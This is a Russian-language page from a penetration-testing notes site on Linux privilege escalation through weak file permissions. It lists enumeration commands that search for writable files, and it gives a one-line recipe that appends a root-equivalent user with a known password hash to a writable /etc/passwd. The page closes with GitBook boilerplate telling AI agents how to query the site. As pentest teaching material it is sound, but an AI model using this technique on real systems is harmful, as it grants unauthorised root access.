> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ru/privesc/permissions.md).

# Права доступа

Повышение привилегий на основе прав доступа злоупотребляет доступными для записи файлами, слабым владением, раскрытыми секретами или чувствительными путями, которыми должен управлять только root. Небольшие ошибки в правах могут привести к прямому доступу root, если они затрагивают файлы аутентификации или пути привилегированного выполнения.

## Методика

* Найдите файлы и каталоги, доступные для записи, вне ожидаемых расположений, контролируемых пользователем.
* Проверьте владельца и групповые права на чувствительные файлы, такие как `/etc/passwd`, резервные копии, скрипты и конфигурации служб.
* Используйте автоматизированное перечисление, чтобы выявить скрытые ошибки в правах, затем проверьте вручную.

## Быстрые проверки

```bash
find / -writable 2>/dev/null
find /etc -writable -type f 2>/dev/null
ls -la /etc/passwd /etc/shadow 2>/dev/null
```

{% hint style="info" %}
Ошибки конфигурации прав раскрывают чувствительные файлы, пути с правом записи или действия только для администратора пользователям с низкими привилегиями. Всегда проверяйте файлы, доступные для записи, владельца, доступ группы и контекст выполнения.
{% endhint %}

## Чувствительные файлы с правом записи

В первую очередь проверяйте системные файлы с правом записи, конфигурации служб, резервные копии и скрипты, которые выполняет root.

```bash
find /etc -writable -type f 2>/dev/null
find /etc/service/ -writable 2>/dev/null
find / -writable -name "*.service" 2>/dev/null
find / -writable -path "/etc/systemd/system/*" 2>/dev/null
```

### `/etc/passwd` Злоупотребление

Если `/etc/passwd` доступен для записи, создайте контролируемый хэш и добавьте временного пользователя с правами, эквивалентными root, только в лаборатории или на разрешённой цели:

```bash
openssl passwd -1 -salt xyz password123
echo 'malicious:$1$xyz$SomeHashedPasswordHere:0:0::/root:/bin/bash' >> /etc/passwd
su malicious
```

<table data-view="cards" data-full-width="false" data-search="false"><thead><tr><th></th><th></th><th></th><th data-hidden data-card-target data-type="content-ref"></th></tr></thead><tbody><tr><td><h3><i class="fa-key" style="color:$primary;">:key:</i></h3></td><td><h4>Калькулятор прав Linux</h4></td><td>Ищите восьмеричные и символьные права, преобразуйте режимы, проверяйте биты SUID/SGID/sticky и оценивайте риск повышения привилегий.</td><td><a href="/pages/23cb17ea2fba84ff4fe3661d1cb326957b4c520f">/pages/23cb17ea2fba84ff4fe3661d1cb326957b4c520f</a></td></tr><tr><td><h3><i class="fa-magnifying-glass" style="color:$primary;">:magnifying-glass:</i></h3></td><td><h4>Умное перечисление</h4></td><td>Заметки по инструменту Smart Enumeration для повышения привилегий в Linux, с шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчёт.</td><td><a href="/pages/7d10f06247292e8beaa8619a21ad75d50007f8c6">/pages/7d10f06247292e8beaa8619a21ad75d50007f8c6</a></td></tr><tr><td><h3><i class="fa-shield-halved" style="color:$primary;">:shield-halved:</i></h3></td><td><h4>/etc/passwd: злоупотребление правом записи</h4></td><td>Заметки по управлению правами (/etc/passwd) для повышения привилегий в Linux, со шагами перечисления, примерами эксплуатации и проверкой, ориентированной на отчёт.</td><td><a href="/pages/ca1f6c214f7b39977933a98de7094329c46cc22d">/pages/ca1f6c214f7b39977933a98de7094329c46cc22d</a></td></tr></tbody></table>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ru/privesc/permissions.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
